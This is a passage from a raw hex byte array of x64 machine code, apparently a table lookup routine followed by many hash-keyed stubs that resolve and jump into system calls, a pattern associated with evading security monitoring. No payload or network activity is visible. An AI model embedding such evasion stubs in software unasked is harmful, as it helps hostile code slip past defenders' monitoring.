29,0xC2,0x89,0x95,0x74,0xFF,0xFF,0xFF,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xEB,0x53,0x8B,0x45,0xE0,0x48,0xC1,0xE0,0x04,0x48,0x89,0xC2,0x48,0x8B,0x45,0x80,0x48,0x01,0xD0,0x8B,0x40,0x04,0x89,0xC2,0x48,0x8B,0x45,0xF0,0x48,0x01,0xD0,0x48,0x89,0x85,0x68,0xFF,0xFF,0xFF,0x8B,0x45,0xE0,0x48,0xC1,0xE0,0x04,0x48,0x89,0xC2,0x48,0x8B,0x45,0x80,0x48,0x8D,0x1C,0x02,0x8B,0x95,0x74,0xFF,0xFF,0xFF,0x48,0x8B,0x85,0x68,0xFF,0xFF,0xFF,0x48,0x89,0xC1,0xE8,0x48,0xFA,0xFF,0xFF,0x48,0x89,0x43,0x08,0x83,0x45,0xE0,0x01,0x8B,0x05,0xA9,0x9F,0x00,0x00,0x83,0xE8,0x01,0x39,0x45,0xE0,0x72,0x9F,0xB8,0x01,0x00,0x00,0x00,0x48,0x81,0xC4,0xE8,0x00,0x00,0x00,0x5B,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0x89,0x4D,0x10,0xE8,0xAC,0xFB,0xFF,0xFF,0x85,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x3B,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xEB,0x22,0x8B,0x45,0xFC,0x48,0xC1,0xE0,0x04,0x48,0x89,0xC2,0x48,0x8D,0x05,0x65,0x9F,0x00,0x00,0x8B,0x04,0x02,0x39,0x45,0x10,0x75,0x05,0x8B,0x45,0xFC,0xEB,0x14,0x83,0x45,0xFC,0x01,0x8B,0x05,0x46,0x9F,0x00,0x00,0x39,0x45,0xFC,0x72,0xD3,0xB8,0x00,0x00,0x00,0x00,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0x89,0x4D,0x10,0xE8,0x50,0xFB,0xFF,0xFF,0x85,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x4D,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xEB,0x34,0x8B,0x45,0xFC,0x48,0xC1,0xE0,0x04,0x48,0x89,0xC2,0x48,0x8D,0x05,0x09,0x9F,0x00,0x00,0x8B,0x04,0x02,0x39,0x45,0x10,0x75,0x17,0x8B,0x45,0xFC,0x48,0xC1,0xE0,0x04,0x48,0x89,0xC2,0x48,0x8D,0x05,0xF8,0x9E,0x00,0x00,0x48,0x8B,0x04,0x02,0xEB,0x14,0x83,0x45,0xFC,0x01,0x8B,0x05,0xD8,0x9E,0x00,0x00,0x39,0x45,0xFC,0x72,0xC1,0xB8,0x00,0x00,0x00,0x00,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x48,0xC7,0xC0,0x00,0x00,0x00,0x00,0xC3,0x90,0x0F,0x0B,0x48,0x8B,0x04,0x24,0xC3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xB9,0x0F,0x2A,0x9B,0xCD,0x00,0x00,0x00,0x00,0x51,0x48,0x83,0xEC,0x28,0xE8,0x57,0xFF,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0xEC,0xFE,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xB9,0x2F,0x1A,0xBF,0xFF,0x00,0x00,0x00,0x00,0x51,0x48,0x83,0xEC,0x28,0xE8,0xFD,0xFE,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x92,0xFE,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x67,0x75,0x8B,0x11,0x51,0x48,0x83,0xEC,0x28,0xE8,0xA6,0xFE,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x3B,0xFE,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x3F,0xD3,0x52,0x22,0x51,0x48,0x83,0xEC,0x28,0xE8,0x4F,0xFE,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0xE4,0xFD,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xB9,0xA2,0x15,0xA9,0x8F,0x00,0x00,0x00,0x00,0x51,0x48,0x83,0xEC,0x28,0xE8,0xF5,0xFD,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x8A,0xFD,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xB9,0x20,0xBC,0xBC,0xBD,0x00,0x00,0x00,0x00,0x51,0x48,0x83,0xEC,0x28,0xE8,0x9B,0xFD,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x30,0xFD,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x80,0xE9,0x93,0x03,0x51,0x48,0x83,0xEC,0x28,0xE8,0x44,0xFD,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0xD9,0xFC,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x32,0x1B,0xAB,0x17,0x51,0x48,0x83,0xEC,0x28,0xE8,0xED,0xFC,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x82,0xFC,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x1B,0x03,0x95,0x05,0x51,0x48,0x83,0xEC,0x28,0xE8,0x96,0xFC,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x2B,0xFC,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x05,0x2F,0x93,0x01,0x51,0x48,0x83,0xEC,0x28,0xE8,0x3F,0xFC,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0xD4,0xFB,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xB9,0xB6,0x8E,0x01,0x96,0x00,0x00,0x00,0x00,0x51,0x48,0x83,0xEC,0x28,0xE8,0xE5,0xFB,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x7A,0xFB,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x1A,0x2A,0xB2,0x24,0x51,0x48,0x83,0xEC,0x28,0xE8,0x8E,0xFB,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x23,0xFB,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0xE3,0xE2,0x98,0x11,0x51,0x48,0x83,0xEC,0x28,0xE8,0x37,0xFB,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0xCC,0xFA,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x8F,0x2C,0x5B,0x4A,0x51,0x48,0x83,0xEC,0x28,0xE8,0xE0,0xFA,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x75,0xFA,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xB9,0x13,0xA4,0xBF,0x9C,0x00,0x00,0x00,0x00,0x51,0x48,0x83,0xEC,0x28,0xE8,0x86,0xFA,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x1B,0xFA,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x4F,0xF6,0x23,0x0E,0x51,0x48,0x83,0xEC,0x28,0xE8,0x2F,0xFA,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0xC4,0xF9,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0xE3,0x76,0x63,0x42,0x51,0x48,0x83,0xEC,0x28,0xE8,0xD8,0xF9,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x6D,0xF9,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x1A,0x6A,0xB2,0x64,0x51,0x48,0x83,0xEC,0x28,0xE8,0x81,0xF9,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x16,0xF9,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0xA0,0x64,0x2E,0x65,0x51,0x48,0x83,0xEC,0x28,0xE8,0x2A,0xF9,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0xBF,0xF8,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x0C,0x32,0x9F,0x1D,0x51,0x48,0x83,0xEC,0x28,0xE8,0xD3,0xF8,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x68,0xF8,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x36,0x71,0x91,0x27,0x51,0x48,0x83,0xEC,0x28,0xE8,0x7C,0xF8,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x11,0xF8,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x84,0x83,0x9C,0x09,0x51,0x48,0x83,0xEC,0x28,0xE8,0x25,0xF8,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0xBA,0xF7,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x87,0x5F,0xBE,0x1A,0x51,0x48,0x83,0xEC,0x28,0xE8,0xCE,0xF7,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x63,0xF7,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xB9,0xEA,0x62,0xBD,0xBC,0x00,0x00,0x00,0x00,0x51,0x48,0x83,0xEC,0x28,0xE8,0x74,0xF7,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x09,0xF7,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xB9,0x6D,0xBA,0xD1,0x8A,0x00,0x00,0x00,0x00,0x51,0x48,0x83,0xEC,0x28,0xE8,0x1A,0xF7,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0xAF,0xF6,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xB9,0x0F,0x98,0x97,0x8C,0x00,0x00,0x00,0x00,0x51,0x48,0x83,0xEC,0x28,0xE8,0xC0,0xF6,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x55,0xF6,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xB9,0xA7,0x8C,0x3A,0xA6,0x00,0x00,0x00,0x00,0x51,0x48,0x83,0xEC,0x28,0xE8,0x66,0xF6,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0xFB,0xF5,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xB9,0xF9,0x12,0x69,0xF0,0x00,0x00,0x00,0x00,0x51,0x48,0x83,0xEC,0x28,0xE8,0x0C,0xF6,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0xA1,0xF5,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x18,0x39,0xA3,0x73,0x51,0x48,0x83,0xEC,0x28,0xE8,0xB5,0xF5,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x4A,0xF5,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0xFB,0x5E,0xAB,0x7C,0x51,0x48,0x83,0xEC,0x28,0xE8,0x5E,0xF5,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0xF3,0xF4,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x1E,0x5C,0x98,0x38,0x51,0x48,0x83,0xEC,0x28,0xE8,0x07,0xF5,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x9C,0xF4,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xB9,0x82,0x4D,0xDF,0x84,0x00,0x00,0x00,0x00,0x51,0x48,0x83,0xEC,0x28,0xE8,0xAD,0xF4,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x42,0xF4,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xB9,0x0C,0x86,0xB2,0xA1,0x00,0x00,0x00,0x00,0x51,0x48,0x83,0xEC,0x28,0xE8,0x53,0xF4,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0xE8,0xF3,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x80,0x2D,0x1F,0x0A,0x51,0x48,0x83,0xEC,0x28,0xE8,0xFC,0xF3,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x91,0xF3,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x13,0x36,0x82,0x14,0x51,0x48,0x83,0xEC,0x28,0xE8,0xA5,0xF3,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x3A,0xF3,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0